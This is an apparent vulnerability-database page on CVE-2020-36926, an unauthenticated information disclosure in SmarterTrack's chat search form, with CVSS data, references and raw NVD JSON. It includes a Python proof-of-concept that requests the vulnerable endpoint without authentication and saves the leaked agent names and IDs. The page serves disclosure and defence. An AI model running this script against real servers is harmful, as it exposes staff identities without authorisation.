Security Vulnerability Report
CVE-2020-36926 CVSS 7.5 HIGH

CVE-2020-36926

Published: 2026-01-16 00:16:19
Last Modified: 2026-02-09 15:12:37

Description

SmarterTrack 7922 contains an information disclosure vulnerability in the Chat Management search form that reveals agent identification details. Attackers can access the vulnerable /Management/Chat/frmChatSearch.aspx endpoint to retrieve agents' first and last names along with their unique identifiers.

CVSS Details

CVSS Score: 7.5
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:smartertools:smartertrack:10.0:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:smartertools:smartertrack:14.0:*:*:*:*:*:*:* - VULNERABLE
SmarterTrack <= 7922

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests

# CVE-2020-36926 PoC - SmarterTrack Information Disclosure
# Target: SmarterTrack <= 7922
# Endpoint: /Management/Chat/frmChatSearch.aspx

def exploit_cve_2020_36926(target_url):
    """
    Exploit for SmarterTrack Chat Management Information Disclosure
    This PoC demonstrates unauthorized access to agent information
    """
    # Target endpoint that leaks agent information
    endpoint = "/Management/Chat/frmChatSearch.aspx"
    full_url = target_url.rstrip('/') + endpoint

    headers = {
        'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36',
        'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
    }

    print(f"[*] Exploiting CVE-2020-36926")
    print(f"[*] Target: {full_url}")

    try:
        # Send unauthenticated request to vulnerable endpoint
        response = requests.get(full_url, headers=headers, timeout=30, verify=False)

        if response.status_code == 200:
            print(f"[+] Request successful - Status: {response.status_code}")
            print(f"[+] Agent information may be exposed in response")

            # Extract potential agent data from response
            if 'Agent' in response.text or 'agent' in response.text:
                print("[!] Agent identifiers found in response")

            # Save response for analysis
            with open('cve_2020_36926_response.html', 'w') as f:
                f.write(response.text)
            print("[*] Response saved to cve_2020_36926_response.html")

            return True
        else:
            print(f"[-] Unexpected status code: {response.status_code}")
            return False

    except requests.exceptions.RequestException as e:
        print(f"[-] Request failed: {e}")
        return False

if __name__ == "__main__":
    import sys
    if len(sys.argv) > 1:
        target = sys.argv[1]
    else:
        target = "http://target-server.com"  # Replace with actual target

    exploit_cve_2020_36926(target)

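References

https://www.exploit-db.com/exploits/50328 (Exploit)
https://www.smartertools.com/ (Product)
https://www.smartertools.com/smartertrack (Product)
https://www.vulncheck.com/advisories/smartertools-smartertrack-information-disclosure (Third Party Advisory)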

Raw JSON Data

JSON
{"cve": {"id": "CVE-2020-36926", "sourceIdentifier": "[email protected]", "published": "2026-01-16T00:16:18.820", "lastModified": "2026-02-09T15:12:37.283", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "SmarterTrack 7922 contains an information disclosure vulnerability in the Chat Management search form that reveals agent identification details. Attackers can access the vulnerable /Management/Chat/frmChatSearch.aspx endpoint to retrieve agents' first and last names along with their unique identifiers."}, {"lang": "es", "value": "SmarterTrack 7922 contiene una vulnerabilidad de revelación de información en el formulario de búsqueda de Gestión de Chat que revela detalles de identificación de agentes. Los atacantes pueden acceder al endpoint vulnerable /Management/Chat/frmChatSearch.aspx para recuperar los nombres y apellidos de los agentes junto con sus identificadores únicos."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 6.9, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", 
"modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 3.6}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-497"}]}, {"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "NVD-CWE-noinfo"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:smartertools:smartertrack:10.0:*:*:*:*:*:*:*", "matchCriteriaId": "DE876385-2B46-4904-9A20-6C259C4D7DBE"}, {"vulnerable": true, "criteria": "cpe:2.3:a:smartertools:smartertrack:14.0:*:*:*:*:*:*:*", 
"matchCriteriaId": "1A9B207E-7632-4F57-9989-8241FCF01764"}]}]}], "references": [{"url": "https://www.exploit-db.com/exploits/50328", "source": "[email protected]", "tags": ["Exploit"]}, {"url": "https://www.smartertools.com/", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://www.smartertools.com/smartertrack", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://www.vulncheck.com/advisories/smartertools-smartertrack-information-disclosure", "source": "[email protected]", "tags": ["Third Party Advisory"]}, {"url": "https://www.exploit-db.com/exploits/50328", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Exploit"]}]}}